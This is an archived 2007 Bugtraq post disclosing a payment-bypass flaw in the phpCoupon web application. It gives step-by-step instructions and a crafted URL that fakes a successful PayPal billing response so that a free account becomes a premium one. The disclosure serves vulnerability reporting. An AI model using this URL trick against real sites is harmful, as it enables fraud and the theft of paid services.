| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 28 Jul 2007 05:18:04 -0000 From: hack2prison@...oo.com To: bugtraq@...urityfocus.com Subject: phpCoupon Vulnerabilities Discovered by freeprotect.net member Vendor site: http://phpcoupon.com ==================================== phpCoupon is Developed to provide an affordable and easy to operate local coupon websites for local and niche directory owners and entrepreneurs seeking income opportunites. It has a security hole. Please show how to exploit following: 1. Click "Business Owners" and register account. 2. Login and show: ------------------------------------------------- Membership Expiration: 00-00-0000 Maximum Coupons: 0 Coupons Used: 0 Coupons Available: 0 ------------------------------------------------- Meaning you aren't Premium Member. 3. Click "Billing Control Panel" Click "Buy now" will redirect to paypal.com OK, now copy this link http://site.com/path/user.php/user.php?REQ=auth&billing=141&status=success&custom=upgradeX and paste override paypal link. Note: =upgradeX ---> X is number of coupon you need. Example: http://site.com/path/user.php/user.php?REQ=auth&billing=141&status=success&custom=upgrade5 OK now relogin you account you see: ------------------------------------------------- Membership Expiration: 07-28-2007 Maximum Coupons: 0 Coupons Used: 0 Coupons Available: 0 ------------------------------------------------- You are Premium Member!!!!
Powered by blists - more mailing lists